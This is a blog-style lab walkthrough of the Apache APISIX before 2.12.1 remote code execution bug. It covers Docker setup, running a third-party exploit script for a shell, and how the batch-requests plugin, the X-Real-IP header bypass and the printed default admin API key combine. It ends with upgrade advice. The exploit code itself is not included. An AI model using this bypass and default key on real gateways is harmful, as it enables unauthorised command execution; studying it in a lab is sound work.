Exploiting the Apache APISIX < 2.12.1 RCE

Apache APISIX < 2.12.1 Remote Code Execution

What is Apache APISIX ?

Apache APISIX is a dynamic, real-time, high-performance API gateway. It provides traffic management features such as load balancing, dynamic upstream, authentication, canary release etc.

What is The Apache APISIX Vulnerability?

On June 16, 2021, Apache officially released a Remote Code Execution vulnerability in Apache APISIX version prior to 2.12.1 . An attacker can abuse the batch-requests plugin in APISIX to send requests to bypass the IP restriction which will result on bypassing whitelists and blacklists. If it uses default configuration, one can invoke the Admin API via the batch-request plugin enabling remote code execution.

1 - Setup the environment

Firstly, you have to download and install Apache APISIX on your local machine.

For that there are a couple of choices. You can use RPM Repository, Docker, Helm Chart, or source release package to install it.

For the sake of simplicity we are going to use docker.

1-    Clone the git repo 
git clone https://github.com/apache/apisix-docker.git
2-    Edit the docker-compose.yml file to change verion from the :latest to a version that is prior to 2.12.1
vim apisix-docker/example/docker-compose.yml


3-    You can now use docker-compose 
docker-compose -p docker-apisix up -d

The Compose

4-    After this is done, I can access the API with a simple curl
curl '' -i 
        > You can find the admin api key on the config.yaml file


5 - The Result

The Result

2 - The Exploitation

You can check & use this little python script already made by @VEN3XY on Exploit-DB


Download the scipt from his github repo : Apisix-Exploit.py

And run it :

you’ll need your Docker Interface IP, you can execute this command to get it easier.

ip -4 addr show docker0 | grep -oP '(?<=inet\s)\d+(.\d+){3}'

Docker Internal IP

python3 apisix-exploit.py 9999

After executing you’ll get a sheel as nobody

3 - The Explanation

1 - requests


Line 77 & Line 79, here you can see 2 requests are made to the API.

Looking at the json_data you can see the first request just plants the payload and the second one triggers it.

The response1 is planting, and response2 is triggering

2 - executing


From Line 61 & Line 75, we can see that it’s executing commands using os.execute.

And as exaplined above What is The Apache APISIX Vulnerability, this RCE vulnerability arises with being able to bypass IP restriction and the Admin API using the default configuration.

The IP restriction is bypassed by using X-Real-IP header setting to

And setting X-API-KEY to the the default admin API token which is edd1c9f034335f136f87ad84b625c8f1

After running the exploit, if we look at the routes with the API, we see a new route is added.

curl -s ''|jq

New Route

4 - Mitigation

An already patched version (2.12.1) of APISIX is released. Users can simply upgrade to the unaffected version.



© 2022 - Sofiane Hamlaooui - Making the world a better place 🌎